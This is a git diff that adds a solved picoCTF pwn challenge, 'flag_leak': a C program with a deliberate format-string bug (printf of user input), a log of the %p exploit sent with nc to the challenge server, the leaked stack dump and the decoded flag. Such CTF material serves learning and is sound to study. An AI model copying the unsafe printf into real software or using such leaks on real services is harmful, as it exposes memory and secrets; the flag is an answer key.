diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt
new file mode 100644
index 0000000..d98d0c0
--- /dev/null
+++ b/pwn/flag_leak/flag.txt
@@ -0,0 +1,5 @@
+# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
+#
+# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
+
+picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}
diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt
new file mode 100644
index 0000000..f5f3e94
--- /dev/null
+++ b/pwn/flag_leak/output.txt
@@ -0,0 +1,3 @@
+$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
+Tell me a story and then I'll tell you one >> Here's a story -
+0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5
diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln
new file mode 100755
index 0000000..666c7d1
Binary files /dev/null and b/pwn/flag_leak/vuln differ
diff --git a/pwn/flag_leak/vuln.c b/pwn/flag_leak/vuln.c
new file mode 100644
index 0000000..ca0491a
--- /dev/null
+++ b/pwn/flag_leak/vuln.c
@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+   char flag[BUFSIZE];
+   char story[128];
+
+   readflag(flag, FLAGSIZE);
+
+   printf("Tell me a story and then I'll tell you one >> ");
+   scanf("%127s", story);
+   printf("Here's a story - \n");
+   printf(story);
+   printf("\n");
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+  return 0;
+}